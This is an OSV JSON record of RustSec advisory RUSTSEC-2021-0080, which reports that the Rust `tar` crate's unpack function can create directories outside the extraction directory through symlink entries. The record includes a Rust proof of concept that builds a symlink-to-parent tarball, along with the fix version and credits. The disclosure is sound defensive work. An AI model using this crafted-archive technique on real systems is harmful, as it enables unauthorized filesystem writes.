{"id":"RUSTSEC-2021-0080","summary":"Links in archive can create arbitrary directories","details":"When unpacking a tarball that contains a symlink the `tar` crate may create\ndirectories outside of the directory it's supposed to unpack into.\n\nThe function errors when it's trying to create a file, but the folders are\nalready created at this point.\n\n```rust\nuse std::{io, io::Result};\nuse tar::{Archive, Builder, EntryType, Header};\n\nfn main() -\u003e Result\u003c()\u003e {\n    let mut buf = Vec::new();\n\n    {\n        let mut builder = Builder::new(&mut buf);\n\n        // symlink: parent -\u003e ..\n        let mut header = Header::new_gnu();\n        header.set_path(\"symlink\")?;\n        header.set_link_name(\"..\")?;\n        header.set_entry_type(EntryType::Symlink);\n        header.set_size(0);\n        header.set_cksum();\n        builder.append(&header, io::empty())?;\n\n        // file: symlink/exploit/foo/bar\n        let mut header = Header::new_gnu();\n        header.set_path(\"symlink/exploit/foo/bar\")?;\n        header.set_size(0);\n        header.set_cksum();\n        builder.append(&header, io::empty())?;\n\n        builder.finish()?;\n    };\n\n    Archive::new(&*buf).unpack(\"demo\")\n}\n```\n\nThis has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is\npublished as `tar` 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering\nand reporting this, and Nikhil Benesch (@benesch) for the fix!","aliases":["CVE-2021-38511","GHSA-62jx-8vmh-4mcw"],"modified":"2023-11-08T04:06:27.878399Z","published":"2021-07-19T12:00:00Z","database_specific":{"license":"CC0-1.0"},"references":[{"type":"PACKAGE","url":"https://crates.io/crates/tar"},{"type":"ADVISORY","url":"https://rustsec.org/advisories/RUSTSEC-2021-0080.html"},{"type":"REPORT","url":"https://github.com/alexcrichton/tar-rs/issues/238"}],"affected":[{"package":{"name":"tar","ecosystem":"crates.io","purl":"pkg:cargo/tar"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.0.0-0"},{"fixed":"0.4.36"}]}],"ecosystem_specific":{"affects":{"functions":["tar::Archive::unpack"],"os":[],"arch":[]},"affected_functions":null},"database_specific":{"categories":[],"source":"https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2021-0080.json","cvss":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","informational":null}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}]}